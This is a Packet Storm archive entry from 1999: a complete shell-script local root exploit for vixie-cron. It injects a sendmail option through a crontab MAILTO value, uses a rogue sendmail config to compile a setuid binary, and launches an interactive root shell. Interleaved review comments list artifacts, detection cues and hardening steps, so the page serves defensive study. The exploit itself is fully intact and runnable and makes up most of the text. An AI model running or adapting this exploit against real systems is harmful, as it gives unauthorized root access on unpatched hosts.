rootcron.txt

1999-09-21T00:00:00
ID PACKETSTORM:15686
Type packetstorm
Reporter Packet Storm
Modified 1999-09-21T00:00:00

Description

                                        
                                            `#!/bin/sh  
  
# Review annotations (defender's reading of this listing).  
# Per its own banner this is a local privilege-escalation proof of concept  
# against vixie-cron. It stages three files in /tmp, installs a crontab whose  
# MAILTO value begins with a sendmail option, waits for cron to fire, then  
# removes its staging files.  
# Artifacts worth hunting for: /tmp/vixie-cf, /tmp/vixie-root,  
# /tmp/vixie-own3d.c, a set-uid/set-gid /tmp/vixie-own3d, and any user  
# crontab whose MAILTO value starts with '-'.  
clear  
  
echo '------------------------------------------------------------------'  
echo 'Marchew Hyperreal Industries <marchew@dione.ids.pl>'  
echo 'Stumilowy Las Team <100milowy@gdynia.ids.pl>'  
echo '---------------------------- presents ----------------------------'  
echo   
echo ' -= vixie-cron root sploit by Michal Zalewski <lcamtuf@ids.pl> =-'  
echo  
  
# Pre-flight checks. Each one is a precondition a defender can remove:  
# a set-uid, executable crontab at a fixed path, a sendmail binary, and a  
# compiler on the host.  
# NOTE(review): limiting who may run crontab (e.g. a cron.allow policy) and  
# keeping compilers off hosts that do not need them are general hardening  
# steps; neither is shown on this page, so confirm what applies locally.  
echo '[+] Checking dependencies:'  
  
echo -n ' [*] vixie crontab: '  
  
if [ -u /usr/bin/crontab -a -x /usr/bin/crontab ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
echo -n ' [*] Berkeley Sendmail: '  
  
if [ -f /usr/sbin/sendmail ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
echo -n ' [*] gcc compiler: '  
  
if [ -x /usr/bin/gcc ]; then  
echo "OK"  
else  
echo "NOT FOUND!"  
exit 1  
fi  
  
# Preconditions the script states but cannot verify. They map directly onto  
# the two mitigations: a fixed cron package, and /tmp mounted with  
# noexec/nosuid (the helper below must execute from /tmp and the final  
# binary relies on its set-uid bit being honoured there).  
echo ' [?] Dependiences not verified:'  
echo ' [*] proper version of vixie crontab'  
echo ' [*] writable /tmp without noexec/nosuid option'  
echo '[+] Exploit started.'  
  
echo "[+] Setting up .cf file for sendmail..."  
  
# Alternate sendmail configuration written to a world-writable directory.  
# As written below it moves the queue directory to /tmp, sets DefaultUser to  
# 0:0 and defines the "local" mailer's program as /tmp/vixie-root.  
# A sendmail config file appearing outside the system configuration  
# directory is itself a strong indicator.  
cat >/tmp/vixie-cf <<__eof__  
V7/Berkeley  
  
O QueueDirectory=/tmp  
O DefaultUser=0:0  
  
R$+ \$#local $: \$1 regular local names  
  
Mlocal, P=/tmp/vixie-root, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,  
T=DNS/RFC822/X-Unix,  
A=vixie-root  
__eof__  
  
echo '[+] Setting up phase #1 tool (phase #2 tool compiler)...'  
  
# Helper script named as the mailer program in the config above. It compiles  
# the C source staged further down and sets mode 6755 (set-uid + set-gid) on  
# the result. The binary is owned by whoever runs this helper, so presumably  
# the chain only yields root if sendmail invokes it as uid 0 - confirm.  
cat >/tmp/vixie-root <<__eof__  
#!/bin/sh  
  
gcc /tmp/vixie-own3d.c -o /tmp/vixie-own3d  
chmod 6755 /tmp/vixie-own3d  
__eof__  
  
chmod 755 /tmp/vixie-root  
  
echo '[+] Setting up phase #2 tool (rootshell launcher)...'  
  
# C source for the launcher: setuid(0)/setgid(0), unlink of its own path,  
# then exec of an interactive /bin/sh. Because it deletes itself on first  
# run, a missing /tmp/vixie-own3d afterwards does not show the attempt failed.  
cat >/tmp/vixie-own3d.c <<__eof__  
main() {  
setuid(0);  
setgid(0);  
unlink("/tmp/vixie-own3d");  
execl("/bin/sh","sh","-i",0);  
}  
__eof__  
  
echo '[+] Putting evil crontab entry...'  
  
# The trigger. "crontab -" reads a complete table from stdin, so this  
# replaces any crontab the invoking user already had.  
# MAILTO carries '-C/tmp/vixie-cf'; presumably (cron's side is not shown on  
# this page) the affected cron hands that value to sendmail unsanitised, so  
# it is parsed as an option selecting the config above instead of as a  
# recipient. The every-minute job 'nonexist' looks chosen to fail so that  
# cron has output to mail - inferred, not shown.  
# Detection: a MAILTO value beginning with '-' has no legitimate use.  
crontab - <<__eof__  
MAILTO='-C/tmp/vixie-cf dupek'  
* * * * * nonexist  
__eof__  
  
echo '[+] Patience is a virtue... Wait up to 60 seconds.'  
  
ILE=0  
  
echo -n '[+] Tick.'  
  
# Poll for the set-uid binary: at most 50 rounds of a 2-second sleep.  
# ILE is forced to 1000 to leave the loop as soon as the file exists.  
while [ $ILE -lt 50 ]; do  
sleep 2  
let ILE=ILE+1  
test -f /tmp/vixie-own3d && ILE=1000  
echo -n '.'  
done  
  
echo  
echo '[+] Huh, done. Removing crontab entry...'  
  
# Removes the invoking user's entire crontab, not only the entry added above.  
crontab -r  
  
echo '[+] Removing helper files...'  
  
# Cleanup of the staging files plus /tmp/df* and /tmp/qf*, presumably the  
# sendmail queue files produced by QueueDirectory=/tmp above; the globs also  
# match unrelated files with those prefixes. Once this runs, the only staged  
# file left on disk is /tmp/vixie-own3d, until it is executed.  
# NOTE(review): cron and mail logs are likely the more durable record of  
# the event - confirm what the host actually logs.  
rm -f /tmp/vixie-own3d.c /tmp/vixie-root /tmp/vixie-cf /tmp/df* /tmp/qf* &>/dev/null  
  
echo '[*] And now...'  
  
# Success is judged purely by the binary's existence. The failure message  
# names the two defensive outcomes: a patched system, or a configuration  
# that breaks the chain.  
if [ -f /tmp/vixie-own3d ]; then  
echo '[+] Entering root shell, babe :)'  
echo  
/tmp/vixie-own3d  
echo  
else  
echo '[-] Oops, no root shell found, patched system or configuration problem :('  
fi  
  
echo '[*] Exploit done.'  
`